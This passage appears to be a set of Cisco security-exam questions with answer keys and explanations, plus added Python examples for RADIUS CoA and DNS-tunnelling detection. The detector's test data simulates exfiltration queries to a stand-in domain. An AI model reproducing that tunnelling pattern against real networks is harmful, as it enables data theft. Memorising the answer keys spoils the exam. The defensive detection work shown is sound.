+ Keyloggers
+ Credential stuffing
+ Brute force and reverse brute force attacks
+ Man-in-the-middle (MITM) attacks

Reference: https://www.onelogin.com/learn/mfa-types-of-cyber-attacks

Question 59

An engineer enabled SSL decryption for Cisco Umbrella intelligent proxy and needs to ensure that traffic is
inspected without alerting end-users. Which action accomplishes this goal?

A. Install the Cisco Umbrella root CA onto the user’s device.
B. Modify the user’s browser settings to suppress errors from Cisco Umbrella.
C. Upload the organization root CA to Cisco Umbrella.
D. Restrict access to only websites with trusted third-party signed certificates.

Answer: A

Explanation

Other features are dependent on SSL Decryption functionality, which requires the Cisco Umbrella root
certificate. Having the SSL Decryption feature improves:
Custom URL Blocking—Required to block the HTTPS version of a URL.

Umbrella’s Block Page and Block Page Bypass features present an SSL certificate to browsers that make
connections to HTTPS sites. This SSL certificate matches the requested site but will be signed by the Cisco
Umbrella certificate authority (CA). If the CA is not trusted by your browser, an error page may be
displayed. Typical errors include “The security certificate presented by this website was not issued by a
trusted certificate authority” (Internet Explorer), “The site’s security certificate is not trusted!” (Google
Chrome) or “This Connection is Untrusted” (Mozilla Firefox). Although the error page is expected, the
message displayed can be confusing and you may wish to prevent it from appearing.
To avoid these error pages, install the Cisco Umbrella root certificate into your browser or the
browsers of your users—if you’re a network admin.

Reference: https://docs.umbrella.com/deployment-umbrella/docs/rebrand-cisco-certificate-import-
information

Question 60

A network engineer has configured an NTP server on a Cisco ASA. The Cisco ASA has IP reachability to the
NTP server and is not filtering any traffic. The show ntp association detail command indicates that the
configured NTP server is unsynchronized and has a stratum of 16. What is the cause of this issue?

A. Resynchronization of NTP is not forced
B. NTP is not configured to use a working server
C. An access list entry for UDP port 123 on the inside interface is missing
D. An access list entry for UDP port 123 on the outside interface is missing

Answer: B

Explanation

Stratum 16 means the configured server is itself not synchronized to any time source, so the ASA, which can
reach it and is not filtering UDP 123, refuses to take time from it. The fix is to point the ASA at a server that
is actually synchronized (stratum 1 to 15); adding access list entries changes nothing.

Question 61

Which direction do attackers encode data in DNS requests during exfiltration using DNS tunneling?

A. inbound
B. north-south
C. east-west
D. outbound

Answer: D

Question 62

Which solution should be leveraged for secure access of a CI/CD pipeline?

A. SSL WebVPN
B. remote access client
C. Duo Network Gateway
D. Cisco FTD network gateway

Answer: C

Explanation

Continuous integration/continuous delivery, known as CI/CD, is a set of processes that help software
development teams deliver code changes more frequently and reliably. CI/CD is part of DevOps, which
helps shorten the software development lifecycle.

Using Cisco Secure Access by Duo will establish user-device trust and highly secure access to applications
to help you identify corporate versus personal devices with easy certificate deployment, block untrusted
endpoints, and give users secure access to internal applications without using VPNs. Furthermore, Duo
Network Gateway provides granular user and endpoint access control to CI/CD applications and
infrastructure over HTTPS, SSH and RDP.

Reference: https://blogs.cisco.com/developer/cloudnativesecurity01

Also from https://www.ciscolive.com/c/dam/r/ciscolive/emea/docs/2020/pdf/R6BGArNQ/TECSEC-2768.pdf

Question 63

Which type of data exfiltration technique encodes data in outbound DNS requests to specific servers and
can be stopped by Cisco Umbrella?

A. DNS tunneling
B. DNS flood attack
C. cache poisoning
D. DNS hijacking

Answer: A

Question 64

Which system performs compliance checks and remote wiping?

A. OTP
B. MDM
C. AMP
D. ISE

Answer: B

Explanation

The MDM service usually offers a “corporate wipe”, which only deletes the vendor’s configuration from the
device (not the whole device). The user can also remove the files. For example, on an iOS device, the user
can go to the Settings > General >Device management window, and click Remove Management. Or the
user can go to the MyDevices portal in Cisco ISE and click Corporate Wipe.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-
4/admin_guide/b_ISE_admin_guide_24/m_ise_interoperability_mdm.html

MDM can also perform periodic compliance checks.

Question 65

Why is it important to patch endpoints consistently?

A. Patching helps to mitigate vulnerabilities.
B. Patching reduces the attack surface of the infrastructure.
C. Patching is required per the vendor contract.
D. Patching allows for creating a honeypot.

Answer: A

Question 66

What are two facts about WSA HTTP proxy configuration with a PAC file? (Choose two)

A. It is defined as a Transparent proxy deployment.
B. In a dual-NIC configuration, the PAC file directs traffic through the two NICs to the proxy.
C. The PAC file, which references the proxy, is deployed to the client web browser.
D. It is defined as an Explicit proxy deployment.
E. It is defined as a Bridge proxy deployment.

Answer: C D

Explanation

A Proxy Auto-Configuration (PAC) file is a JavaScript function that instructs a browser to forward traffic to
a proxy server, instead of directly to the destination server.

PAC files are used to support explicit proxy deployments (-> Answer A and answer E are not correct while
answer D is correct) in which client browsers are explicitly configured to send traffic to the web proxy. The
big advantage of PAC files is that they are usually relatively easy to create and maintain.

When a user initiates a browser session, a request is sent to a Proxy server to download the Proxy Auto-
Configuration (PAC) file to the client PC -> Answer C is correct.

Question 67

How does Cisco Umbrella protect clients when they operate outside of the corporate network?

A. by modifying the registry for DNS lookups
B. by using Active Directory group policies to enforce Cisco Umbrella DNS servers
C. by forcing DNS queries to the corporate name servers
D. by using the Cisco Umbrella roaming client

Answer: D

Explanation

The Umbrella roaming client is a lightweight agent on the endpoint (also delivered as the Umbrella Roaming
Security module for AnyConnect) that forwards the endpoint’s DNS queries to the Umbrella resolvers
wherever the device is, so the same DNS-layer policy applies when the user is off the corporate network
and not on the VPN.

Question 68

Which function is included when Cisco AMP is added to web security?

A. multifactor, authentication-based user identity
B. detailed analytics of the unknown file’s behavior
C. phishing detection on emails
D. threat prevention on an infected endpoint

Answer: B

Explanation

File Sandboxing provides you with the ability to analyze unknown files that are traversing the Cisco Web
Security gateway.

Reference: https://www.cisco.com/c/dam/global/th_th/assets/docs/seminar/AMP_WSA.pdf

Question 69

When a next-generation endpoint security solution is selected for a company, what are two key
deliverables that help justify the implementation? (Choose two)

A. continuous monitoring of all files that are located on connected endpoints
B. macro-based protection to keep connected endpoints safe
C. signature-based endpoint protection on company endpoints
D. email integration to protect endpoints from malicious content that is located in email
E. real-time feeds from global threat intelligence centers

Answer: A E

Question 70

Which two actions does the Cisco Identity Services Engine posture module provide that ensures endpoint
security? (Choose two)

A. The latest antivirus updates are applied before access is allowed.
B. Assignments to endpoint groups are made dynamically, based on endpoint attributes.
C. Patch management remediation is performed.
D. A centralized management solution is deployed.
E. Endpoint supplicant configuration is deployed.

Answer: A C

Explanation

You can create a patch management remediation, which updates clients with up-to-date file definitions for
compliance after remediation.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-
4/admin_guide/b_ISE_admin_guide_24/m_client_posture_policies.html

Question 71

Why should organizations migrate to an MFA strategy for authentication?

A. Single methods of authentication can be compromised more easily than MFA.
B. Biometrics authentication leads to the need for MFA due to its ability to be hacked easily.
C. MFA methods of authentication are never compromised.
D. MFA does not require any piece of evidence for an authentication mechanism.

Answer: A

Question 72

What is the purpose of joining Cisco WSAs to an appliance group?

A. All WSAs in the group can view file analysis results
B. It simplifies the task of patching multiple appliances
C. It supports cluster operations to expedite the malware analysis process
D. The group supports improved redundancy

Answer: D

Question 73

Which Cisco solution extends network visibility, threat detection, and analytics to public cloud
environments?

A. Cisco Umbrella
B. Cisco Stealthwatch Cloud
C. Cisco Appdynamics
D. Cisco CloudLock

Answer: B

Question 74

Which two Cisco ISE components must be configured for BYOD? (Choose two)

A. central WebAuth
B. local WebAuth
C. null WebAuth
D. guest
E. dual

Answer: A D

Question 75

Which configuration method provides the options to prevent physical and virtual endpoint devices that are
in the same base EPG or uSeg from being able to communicate with each other with VMware VDS or
Microsoft vSwitch?

A. inter-EPG isolation
B. intra-EPG isolation
C. inter-VLAN security
D. placement in separate EPGs

Answer: B

Explanation

Intra-EPG Isolation is an option to prevent physical or virtual endpoint devices that are in the same base
EPG or uSeg EPG from communicating with each other. By default, endpoint devices included in the same
EPG are allowed to communicate with one another. However, conditions exist in which total isolation of the
endpoint devices from one another within an EPG is desirable. For example, you may want to enforce
intra-EPG isolation if the endpoint VMs in the same EPG belong to multiple tenants, or to prevent the
possible spread of a virus.

Reference: https://www.cisco.com/c/en/us/td/docs/switches/datacenter/aci/apic/sw/3-
x/virtualization/b_ACI_Virtualization_Guide_3_1_1/b_ACI_Virtualization_Guide_3_1_1_chapter_0101.html

Question 76

In which scenario is endpoint-based security the solution?

A. inspecting encrypted traffic


B. device profiling and authorization
C. performing signature-based application control
D. inspecting a password-protected archive

Answer: D

Question 77

What are two ways that Cisco Container Platform provides value to customers who utilize cloud service
providers? (Choose two)

A. allows developers to create code once and deploy to multiple clouds
B. helps maintain source code for cloud deployments
C. manages Docker containers
D. manages Kubernetes clusters
E. creates complex tasks for managing code

Answer: A D

Question 78

What is the recommendation in a zero-trust model before granting access to corporate applications and
resources?

A. to use multifactor authentication
B. to use strong passwords
C. to use a wired network, not wireless
D. to disconnect from the network when inactive

Answer: A

Question 79

An organization must add new firewalls to its infrastructure and wants to use Cisco ASA or Cisco FTD. The
chosen firewalls must provide methods of blocking traffic that include offering the user the option to
bypass the block for certain sites after displaying a warning page and to reset the connection. Which
solution should the organization choose?

A. Cisco FTD because it supports system rate level traffic blocking, whereas Cisco ASA does not
B. Cisco ASA because it allows for interactive blocking and blocking with reset to be configured via the
GUI, whereas Cisco FTD does not.
C. Cisco FTD because it enables interactive blocking and blocking with reset natively, whereas Cisco ASA
does not
D. Cisco ASA because it has an additional module that can be installed to provide multiple blocking
capabilities, whereas Cisco FTD does not.

Answer: C

Question 80

Which IETF attribute is supported for the RADIUS CoA feature?

A. 81 Message-Authenticator
B. 30 Calling-Station-ID
C. 42 Acct-Session-ID
D. 24 State

Answer: D

Explanation

The RADIUS Change of Authorization (CoA) feature provides a mechanism to change the attributes of an
authentication, authorization, and accounting (AAA) session after it is authenticated. When a policy changes
for a user or user group in AAA, administrators can send the RADIUS CoA packets from the AAA server,
such as a Cisco Secure Access Control Server (ACS), to reinitialize authentication and apply the new policy.

The referenced document lists the IETF attributes the CoA feature supports; 24 State is among them. The
other options pair an attribute name with the wrong IETF number (Message-Authenticator is 80,
Calling-Station-ID is 31, Acct-Session-ID is 44), so only D is correct.

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_aaa/configuration/xe-16-10/sec-
usr-aaa-xe-16-10-book/sec-rad-coa.pdf

Question 81

Which Cisco cloud security software centrally manages policies on multiple platforms such as Cisco ASA,
Cisco Firepower, Cisco Meraki, and AWS?

A. Cisco Secureworks
B. Cisco Configuration Professional
C. Cisco Defense Orchestrator
D. Cisco DNAC

Answer: C

Explanation

Cisco Defense Orchestrator is a cloud-based management solution that allows you to manage security
policies and device configurations with ease across multiple Cisco and cloud-native security platforms.

Cisco Defense Orchestrator features:

….
Management of hybrid environments: Managing a mix of firewalls running the ASA, FTD, and Meraki
MX software is now easy, with the ability to share policy elements across platforms.

Reference: https://www.cisco.com/c/en/us/products/collateral/security/defense-orchestrator/datasheet-
c78-736847.html

Question 82

Which Cisco DNA Center Intent API action is used to retrieve the number of devices known to a DNA
Center?

A. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-device/count
B. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-device
C. GET
https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/networkdevice?parameter1=value&parameter2=v
alue&….
D. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/networkdevice/startIndex/recordsToReturn

Answer: A

Explanation

“/dna/intent/api/v1/network-device/count”

Description: Returns the count of network devices based on the filter criteria by management IP address,
mac address, hostname and location name.

Reference: https://developer.cisco.com/docs/dna-center/#!get-device-count-1

Question 83

What is the difference between a vulnerability and an exploit?

A. A vulnerability is a hypothetical event for an attacker to exploit
B. An exploit is a hypothetical event that causes a vulnerability in the network
C. An exploit is a weakness that can cause a vulnerability in the network
D. A vulnerability is a weakness that can be exploited by an attacker

Answer: D

Explanation

A vulnerability is a weakness in a software system. And an exploit is an attack that leverages that
vulnerability.

Question 84

An administrator needs to configure the Cisco ASA via ASDM such that the network management system
can actively monitor the host using SNMPv3. Which two tasks must be performed for this configuration?
(Choose two)

A. Specify the SNMP manager and UDP port.
B. Specify an SNMP user group
C. Specify a community string.
D. Add an SNMP USM entry
E. Add an SNMP host access entry

Answer: A E

Explanation

This is how to configure SNMP on your Cisco ASA using ASDM: open Configuration > Device Management >
Management Access > SNMP and, under SNMP Management Stations, click Add to create the host access
entry for the manager (interface, IP address of the network management system, UDP port and, for
SNMPv3, the user whose USM credentials the manager will present). The two ASDM screenshots that
accompanied these steps are not reproduced here.

Question 85

Which Cisco security solution determines if an endpoint has the latest OS updates and patches installed on
the system?

A. Cisco Endpoint Security Analytics
B. Cisco AMP for Endpoints
C. Endpoint Compliance Scanner
D. Security Posture Assessment Service

Answer: D

Question 86

When a transparent authentication fails on the Web Security Appliance, which type of access does the end
user get?

A. guest
B. limited Internet
C. blocked
D. full Internet

Answer: C

Explanation

By default the Web Proxy blocks requests from users who fail authentication. Guest access is granted only
when the identification profile is configured to support guest privileges for users who fail authentication;
without that setting the user is blocked.

Question 87

Using Cisco Cognitive Threat Analytics, which platform automatically blocks risky sites and tests unknown
sites for hidden advanced threats before allowing users to click them?

A. Cisco Identity Services Engine
B. Cisco Enterprise Security Appliance
C. Cisco Web Security Appliance
D. Cisco Advanced Stealthwatch Appliance

Answer: C

Question 88

Which technology provides a combination of endpoint protection endpoint detection, and response?

A. Cisco AMP
B. Cisco Talos
C. Cisco Threat Grid
D. Cisco Umbrella

Answer: A

Question 89

When a Cisco WSA checks a web request, what occurs if it is unable to match a user-defined policy?

A. It blocks the request.
B. It applies the global policy.
C. It applies the next identification profile policy.
D. It applies the advanced policy.

Answer: B

Question 90

Which solution supports high availability in routed or transparent mode as well as in northbound and
southbound deployments?

A. Cisco FTD with Cisco ASDM
B. Cisco FTD with Cisco FMC
C. Cisco Firepower NGFW physical appliance with Cisco FMC
D. Cisco Firepower NGFW Virtual appliance with Cisco FMC

Answer: B

Question 91

Which endpoint protection and detection feature performs correlation of telemetry, files, and intrusion
events that are flagged as possible active breaches?

A. retrospective detection
B. elastic search
C. file trajectory
D. indication of compromise

Answer: D

Explanation

Indications of compromise (IoCs): File and telemetry events are correlated and prioritized as potential
active breaches. AMP automatically correlates multisource security event data, such as intrusion and
malware events, to help security teams connect events to larger, coordinated attacks and also prioritize
high-risk events.

Reference: https://www.cisco.com/c/en/us/solutions/collateral/enterprise-networks/advanced-malware-
protection/solution-overview-c22-734228.html

Question 92

Which RADIUS feature provides a mechanism to change the AAA attributes of a session after it is
authenticated?

A. Authorization
B. Accounting
C. Authentication
D. CoA

Answer: D
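Questions 49, 80 and 92 all turn on the same exchange: the AAA server sends a CoA-Request (code 43) that names the session with IETF attributes such as 24 State and 44 Acct-Session-Id, and the NAS answers CoA-ACK (44) when the authorization state was changed or CoA-NAK (45) carrying an Error-Cause (101) when it was not. The following is an added example, not taken from the referenced Cisco documents, that builds and verifies that exchange per RFC 5176 with only the Python standard library. The shared secret, identifier and attribute values are constructed. The Message-Authenticator is computed with the authenticator field zeroed and the Request Authenticator is then computed over the finished packet, which is the ordering common implementations use.

```python
import hashlib
import hmac
import struct

# RADIUS packet codes from RFC 5176
COA_REQUEST, COA_ACK, COA_NAK = 43, 44, 45

# IETF attribute numbers used in this example
STATE, CALLING_STATION_ID, ACCT_SESSION_ID = 24, 31, 44
MESSAGE_AUTHENTICATOR, ERROR_CAUSE = 80, 101

# A few RFC 5176 Error-Cause values a NAS may return in a CoA-NAK
ERROR_CAUSES = {401: "Unsupported Attribute", 402: "Missing Attribute",
                501: "Administratively Prohibited", 503: "Session Context Not Found"}


def _tlv(attr_type: int, value: bytes) -> bytes:
    if len(value) > 253:
        raise ValueError("attribute value too long")
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def _parse_attrs(data: bytes) -> list:
    attrs, pos = [], 0
    while pos < len(data):
        if pos + 2 > len(data) or data[pos + 1] < 2 or pos + data[pos + 1] > len(data):
            raise ValueError("malformed attribute")
        attrs.append((data[pos], data[pos + 2:pos + data[pos + 1]]))
        pos += data[pos + 1]
    return attrs


def build_coa_request(secret: bytes, identifier: int, attributes) -> bytes:
    """CoA-Request (AAA server -> NAS). attributes: iterable of (type, value bytes)."""
    body = b"".join(_tlv(t, v) for t, v in attributes) + _tlv(MESSAGE_AUTHENTICATOR, bytes(16))
    header = struct.pack("!BBH", COA_REQUEST, identifier, 20 + len(body))
    # Message-Authenticator: HMAC-MD5 keyed with the shared secret over the packet,
    # with the authenticator field and the attribute's own value set to zero.
    ma = hmac.new(secret, header + bytes(16) + body, hashlib.md5).digest()
    body = body[:-16] + ma
    # Request Authenticator, same rule as Accounting-Request (RFC 2866):
    # MD5(Code | Identifier | Length | 16 zero octets | Attributes | Secret)
    request_auth = hashlib.md5(header + bytes(16) + body + secret).digest()
    return header + request_auth + body


def verify_coa_request(secret: bytes, packet: bytes) -> bool:
    """What the NAS checks before acting on a CoA-Request."""
    if len(packet) < 20 or struct.unpack("!H", packet[2:4])[0] != len(packet):
        return False
    header, auth, body = packet[:4], packet[4:20], packet[20:]
    if not hmac.compare_digest(hashlib.md5(header + bytes(16) + body + secret).digest(), auth):
        return False
    attrs = _parse_attrs(body)
    received = [v for t, v in attrs if t == MESSAGE_AUTHENTICATOR]
    if len(received) != 1 or len(received[0]) != 16:
        return False
    zeroed = b"".join(_tlv(t, bytes(16) if t == MESSAGE_AUTHENTICATOR else v) for t, v in attrs)
    expected = hmac.new(secret, header + bytes(16) + zeroed, hashlib.md5).digest()
    return hmac.compare_digest(expected, received[0])


def build_coa_response(secret: bytes, request: bytes, code: int, attributes=()) -> bytes:
    """NAS reply: CoA-ACK if the session was changed, CoA-NAK (with Error-Cause) if not."""
    body = b"".join(_tlv(t, v) for t, v in attributes)
    header = struct.pack("!BBH", code, request[1], 20 + len(body))
    # Response Authenticator: MD5(Code | ID | Length | RequestAuth | Attributes | Secret)
    response_auth = hashlib.md5(header + request[4:20] + body + secret).digest()
    return header + response_auth + body


def parse_coa_response(secret: bytes, request: bytes, response: bytes):
    """Server-side check of the reply; returns (code, attrs) or raises ValueError."""
    if len(response) < 20 or struct.unpack("!H", response[2:4])[0] != len(response):
        raise ValueError("bad length")
    header, auth, body = response[:4], response[4:20], response[20:]
    if header[1] != request[1]:
        raise ValueError("identifier does not match the outstanding request")
    expected = hashlib.md5(header + request[4:20] + body + secret).digest()
    if not hmac.compare_digest(expected, auth):
        raise ValueError("bad Response Authenticator (wrong secret or tampered packet)")
    return header[0], _parse_attrs(body)


def describe(code: int, attrs) -> str:
    if code == COA_ACK:
        return "CoA-ACK: authorization state changed"
    if code == COA_NAK:
        causes = [int.from_bytes(v, "big") for t, v in attrs if t == ERROR_CAUSE and len(v) == 4]
        cause = causes[0] if causes else 0
        return f"CoA-NAK: Error-Cause {cause} ({ERROR_CAUSES.get(cause, 'unknown')})"
    return f"unexpected code {code}"


if __name__ == "__main__":
    secret = b"Sup3rS3cret"  # constructed shared secret
    req = build_coa_request(secret, 7, [
        (STATE, b"ise-session-state-01"),            # 24 State: ties the request to the session
        (ACCT_SESSION_ID, b"0000001F"),              # 44 Acct-Session-Id
        (CALLING_STATION_ID, b"00-11-22-33-44-55"),  # 31 Calling-Station-Id
    ])
    assert verify_coa_request(secret, req)
    ack = build_coa_response(secret, req, COA_ACK)
    nak = build_coa_response(secret, req, COA_NAK, [(ERROR_CAUSE, (503).to_bytes(4, "big"))])
    for reply in (ack, nak):
        print(describe(*parse_coa_response(secret, req, reply)))
```

The identifier match and Response Authenticator check in parse_coa_response are what stop a spoofed CoA-ACK from convincing the server that a session was changed when it was not; a NAS that cannot find the session answers CoA-NAK with Error-Cause 503, which is the case to look for first when a CoA appears to do nothing.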

Question 93

Which two authentication protocols are supported by the Cisco WSA? (Choose two)

A. WCCP
B. NTLM
C. TLS
D. SSL
E. LDAP

Answer: B E

Question 94

Which technology should be used to help prevent an attacker from stealing usernames and passwords of
users within an organization?

A. RADIUS-based REAP
B. fingerprinting
C. Dynamic ARP Inspection
D. multifactor authentication

Answer: D

Explanation

Credential stuffing is a type of cyberattack in which a cybercriminal uses stolen usernames and passwords
from one organization (obtained in a breach or purchased off of the dark web) to access user accounts at
another organization.

How To Prevent Credential Stuffing Attacks

Most people know password reuse is unsafe but choose to use the same password on multiple sites
anyway because they have roughly 100 passwords to remember. Password managers are an option, but
adoption rates are low. So to prevent credential stuffing attacks, it’s up to organizations to take measures
— such as removing passwords altogether — to ensure cybercriminals can’t use stolen credentials to
access their users’ accounts. Below are several methods for doing so.

Multi-factor authentication (MFA) is a highly effective way to prevent credential stuffing because it requires
users to log in with another form of authentication in addition to a username-password combination. For
example, this could mean biometric authentication such as a fingerprint, a one-time code sent to a device
associated with the user, or an email sent to a secured account — none of which a cybercriminal will have
access to.

Reference: https://auth0.com/blog/what-is-credential-stuffing/

Question 95

Which baseline form of telemetry is recommended for network infrastructure devices?

A. SDNS
B. NetFlow
C. passive taps
D. SNMP

Answer: D

Question 96

Refer to the exhibit.

Consider that any feature of DNS requests, such as the length of the domain name and the number of
subdomains, can be used to construct models of expected behavior to which observed values can be
compared. Which type of malicious attack are these values associated with?

A. Spectre Worm
B. Eternal Blue Windows
C. Heartbleed SSL Bug
D. W32/AutoRun worm

Answer: D
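Questions 61, 63 and 96 describe the same detection idea: tunnelled exfiltration rides in outbound queries whose names are longer, more random and far more numerous than ordinary lookups, so a baseline of normal query features (name length, subdomain length, subdomain entropy) plus a count of distinct subdomains per registered domain separates them from normal traffic. The script below is an added example, not from the original question set or from Cisco Umbrella, that builds such a model from a constructed set of benign query names and scores a constructed query log. The registered domain is taken naively as the last two labels (no public suffix list), and the thresholds are illustrative.

```python
import hashlib
import math
import statistics
from collections import defaultdict

# Constructed benign query names used to build the baseline (not real traffic).
BASELINE_QUERIES = [
    "www.cisco.com", "mail.google.com", "login.microsoftonline.com", "cdn.jsdelivr.net",
    "api.github.com", "update.microsoft.com", "ocsp.digicert.com", "fonts.gstatic.com",
    "outlook.office365.com", "www.wikipedia.org",
]

# Constructed observed log: (client, qname). The last twelve names imitate a tunnel
# client pushing hex-encoded chunks as subdomains of one attacker-controlled zone.
TUNNEL_QUERIES = [hashlib.md5(f"chunk{i}".encode()).hexdigest() + ".exfil.example.net"
                  for i in range(12)]
OBSERVED_LOG = [
    ("10.0.0.5", "teams.microsoft.com"),
    ("10.0.0.5", "www.example.org"),
    ("10.0.0.9", "ocsp.digicert.com"),
] + [("10.0.0.23", q) for q in TUNNEL_QUERIES]


def registered_domain(qname: str) -> str:
    """Last two labels. Assumption for the example: no public suffix list, so names
    under co.uk-style suffixes would be grouped wrongly."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def subdomain(qname: str) -> str:
    return ".".join(qname.rstrip(".").lower().split(".")[:-2])


def entropy(s: str) -> float:
    """Shannon entropy in bits per character; 0 for empty or single-symbol strings."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def features(qname: str) -> dict:
    sub = subdomain(qname)
    return {"qname_len": len(qname), "sub_len": len(sub), "sub_entropy": entropy(sub)}


def build_model(qnames) -> dict:
    """Per-feature mean and standard deviation learned from benign names."""
    rows = [features(q) for q in qnames]
    model = {}
    for key in rows[0]:
        values = [r[key] for r in rows]
        sd = statistics.stdev(values) if len(values) > 1 else 0.0
        model[key] = (statistics.mean(values), max(sd, 1e-6))  # floor avoids division by zero
    return model


def zscores(model: dict, qname: str) -> dict:
    f = features(qname)
    return {k: (f[k] - mean) / sd for k, (mean, sd) in model.items()}


def is_anomalous(model: dict, qname: str, threshold: float = 3.0) -> bool:
    """Flag names that are longer or more random than the baseline (one-sided test)."""
    return any(z > threshold for z in zscores(model, qname).values())


def busy_domains(log, min_unique: int = 8) -> set:
    """Registered domains queried with many distinct subdomains: the volume signal of
    tunnelling, independent of how any single name looks."""
    seen = defaultdict(set)
    for _client, qname in log:
        seen[registered_domain(qname)].add(subdomain(qname))
    return {d for d, subs in seen.items() if len(subs) >= min_unique}


def report(model: dict, log) -> list:
    return [(client, qname) for client, qname in log if is_anomalous(model, qname)]


if __name__ == "__main__":
    model = build_model(BASELINE_QUERIES)
    for client, qname in report(model, OBSERVED_LOG):
        print(f"anomalous name from {client}: {qname}")
    print("domains with unusually many subdomains:", busy_domains(OBSERVED_LOG))
```

The per-name model alone produces false positives on long but legitimate names (CDN and telemetry hostnames), which is why the per-domain unique-subdomain count is the signal to alert on first; a real deployment learns the baseline per organization and over a much larger benign sample than the ten names here.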

Question 97

Drag and drop the posture assessment flow actions from the left into a sequence on the right.

Answer:

Step 1: Validate user credentials
Step 2: Permit just enough for the posture assessment
Step 3: Check device compliance with security policy
Step 4: Apply updates or take other necessary action
Step 5: Grant appropriate access with compliant device

Question 98

Which Cisco WSA feature supports access control using URL categories?

A. transparent user identification
B. SOCKS proxy services
C. web usage controls
D. user session restrictions

Answer: C

Explanation

URL filtering by category is part of the WSA Web Usage Controls (Acceptable Use Controls) feature, which
classifies each request into a URL category so that access policies can block, monitor, warn on or time-limit
it. Transparent user identification only determines who the user is; it does not control access by URL
category.

Question 99

What is an advantage of the Cisco Umbrella roaming client?

A. the ability to see all traffic without requiring TLS decryption
B. visibility into IP-based threats by tunneling suspicious IP connections
C. the ability to dynamically categorize traffic to previously uncategorized sites
D. visibility into traffic that is destined to sites within the office environment

Answer: B

Explanation

The Umbrella roaming client enables security at the DNS and IP layers, in the cloud, no matter where the
endpoint is located. The client simply forwards DNS requests or tunnels suspect IP connections to the
Umbrella global network.

Reference: https://learn-umbrella.cisco.com/feature-briefs/lightweight-transparent-roaming-client

Question 100

An organization has DHCP servers set up to allocate IP addresses to clients on the LAN. What must be
done to ensure the LAN switches prevent malicious DHCP traffic while also distributing IP addresses to the
correct endpoints?

A. Configure Dynamic ARP Inspection and add entries in the DHCP snooping database
B. Configure DHCP snooping and set an untrusted interface for all clients
C. Configure Dynamic ARP Inspection and antispoofing ACLs in the DHCP snooping database
D. Configure DHCP snooping and set a trusted interface for the DHCP server

Answer: D

Explanation

Dynamic ARP Inspection is a security feature that validates ARP packets in a network. It determines the
validity of a packet by checking the IP-to-MAC address binding against a trusted database (the DHCP
snooping binding database) before forwarding the packet to the appropriate destination.

But this question asks about preventing malicious DHCP traffic, so DHCP snooping is the better choice.

DHCP snooping is a feature that allows a Cisco switch to inspect DHCP traffic traversing a Layer 2
segment, drop DHCP server messages (offers, acks) arriving on untrusted ports, and track which IP
addresses have been assigned to hosts on which switch ports.

We need to mark the interface connected to the real DHCP server as trusted, because all interfaces are
untrusted by default once DHCP snooping is enabled; answer B would leave the legitimate server's replies
blocked as well.

Question 101

Refer to the exhibit.

What is the result of the Python script?

A. It uses the POST HTTP method to obtain a username and password to be used for authentication
B. It uses the POST HTTP method to obtain a token to be used for authentication
C. It uses the GET HTTP method to obtain a token to be used for authentication
D. It uses the GET HTTP method to obtain a username and password to be used for authentication

Answer: B

Question 102

Which solution stops unauthorized access to the system if a user’s password is compromised?

A. VPN
B. MFA
C. AMP
D. SSL

Answer: B

Question 103

Which feature enables a Cisco ISR to use the default bypass list automatically for web filtering?

A. filters
B. group key
C. company key
D. connector

Answer: D

Question 104

Which industry standard is used to integrate Cisco ISE and pxGrid to each other and with other
interoperable security platforms?

A. IEEE
B. IETF
C. NIST
D. ANSI

Answer: B

Question 105

What is a function of the Layer 4 Traffic Monitor on a Cisco WSA?

A. blocks traffic from URL categories that are known to contain malicious content
B. decrypts SSL traffic to monitor for malicious content
C. monitors suspicious traffic across all the TCP/UDP ports
D. prevents data exfiltration by searching all the network traffic for specified sensitive information

Answer: C

Explanation

The Web Security appliance has an integrated Layer-4 Traffic Monitor that detects rogue traffic across all
network ports and stops malware attempts to bypass port 80.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_010110.html

Question 106

Which solution is made from a collection of secure development practices and guidelines that developers
must follow to build secure applications?

A. OWASP
B. Fuzzing Framework
C. Radamsa
D. AFL

Answer: A

Explanation

The OWASP Secure Coding Practices are a set of secure coding best practices and guidelines published by
the Open Web Application Security Project (OWASP, since renamed the Open Worldwide Application Security
Project). They cover both general software security principles and specific secure coding requirements.

Reference: https://snyk.io/learn/secure-coding-practices/

Question 107

What is the process of performing automated static and dynamic analysis of files against preloaded
behavioral indicators for threat analysis?

A. deep visibility scan
B. point-in-time checks
C. advanced sandboxing
D. advanced scanning

Answer: C

Question 108

Which Cisco ISE service checks the compliance of endpoints before allowing the endpoints to connect to
the network?

A. posture
B. profiler
C. Cisco TrustSec
D. Threat Centric NAC

Answer: A

Explanation

Posture is a service in Cisco Identity Services Engine (Cisco ISE) that allows you to check the compliance,
also known as posture, of endpoints, before allowing them to connect to your network.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-
2/admin_guide/b_ise_admin_guide_22/b_ise_admin_guide_22_chapter_010111.html

Question 109

Refer to the exhibit.

import requests

client_id = 'a1b2c3d4e5f6g7h8i9j0'
api_key = 'a1b2c3d4-e5f6-g7h8-i9j0-k1l2m3n4o5p6'

What does the API key do while working with https://api.amp.cisco.com/v1/computers?

A. displays client ID
B. HTTP authorization
C. Imports requests
D. HTTP authentication

Answer: D

Explanation

The Cisco AMP for Endpoints (now Secure Endpoint) API authenticates every request with HTTP Basic
authentication: the Client ID is sent as the user name and the API key as the password in the
Authorization header. The key is a long-lived credential rather than a per-session token, so it should be
created with the narrowest scope the integration needs (read-only where possible) and kept out of source
code. Without these credentials the GET request to the computers endpoint is rejected with 401.
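Added example (not from the exhibit or from Cisco's SDK) of how the Client ID and API key are presented to the AMP for Endpoints API: they become the user name and password of an HTTP Basic Authorization header on every request. The values are the placeholder strings from the exhibit, the request is built with the standard library but not sent, and decode_basic exists only to show that Base64 is encoding, not protection.

```python
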